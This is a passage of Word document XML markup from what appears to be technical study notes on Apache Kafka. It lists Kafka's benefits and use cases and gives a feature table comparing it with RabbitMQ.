          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (older versions) manages coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA6A5B" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007E40A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1DBEA5F4">
          <v:rect id="_x0000_i3060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F1393" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">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Why Use Kafka?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227EEB89" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:num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Real-time data streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1EA748" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:num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High throughput &amp; low latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05045E0F" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:num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Scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13992451" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:num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Durable and fault-tolerant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512FA1C" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:num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Use cases: Logging, metrics, IoT, financial systems, chat systems, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411F755" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007E40A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="35F14261">
          <v:rect id="_x0000_i3061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A7F1F" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">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Common Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FBC337" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log Aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D1807" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Real-Time Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0FB8E8" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Microservices Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29357992" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing / CQRS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03858EFD" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with Kafka Streams or Apache Flink)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB352F" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007E40A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="038C5AAF">
          <v:rect id="_x0000_i3062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC66DC" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7027BA6E" w14:textId="04775C7A" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C84C42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="760" w:name="_Toc196308240"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why does Kafka compare to RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="760"/>
    </w:p>
    <w:p w14:paraId="3F27F031" w14:textId="1B2AE03F" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="002D75F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F3197F" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">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Apache Kafka vs RabbitMQ</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1"/>
        <w:gridCol w:w="3761"/>
        <w:gridCol w:w="4882"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="2FA108A0" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1125E30C" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758408E4" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Apache Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6556023F" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="089BBFBE" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FD49E84"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD2173B"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 xml:space="preserve">Distributed </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>event streaming platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58D1EDC7"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 xml:space="preserve">Traditional </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>message broker / message queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="5BD45AE3" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A178455"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Message Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="533CA671"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pull-based</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Consumers pull data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58CA16AA"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Push-based</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Broker pushes to consumers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="130AAD50" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CAF9C37"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7808DD71"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 xml:space="preserve">High </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>throughput</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, designed for big data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072434CF"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 xml:space="preserve">Low </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>latency</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, better for low-volume, fast delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="54A296DA" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA78DD0"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F81D70"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Messages stored on disk with replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A8DFFFF"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Messages stored in memory or disk (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="67A06C36" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C821264"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ordering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2508876E"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Guaranteed within a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53405F9A"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Ordering is not guaranteed unless specifically handled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="08FDF05E" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10644895"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Replay capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7241445B" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">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Yes – Consumers can </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>re-read</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from any offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CE85B28" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> No – Once consumed, message is gone unless persisted manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="3E7A6089" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10FAE9AB"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Retention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E2FC59"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Time-based/log-based retention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12F790CA"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Messages removed after acknowledged</w:t>
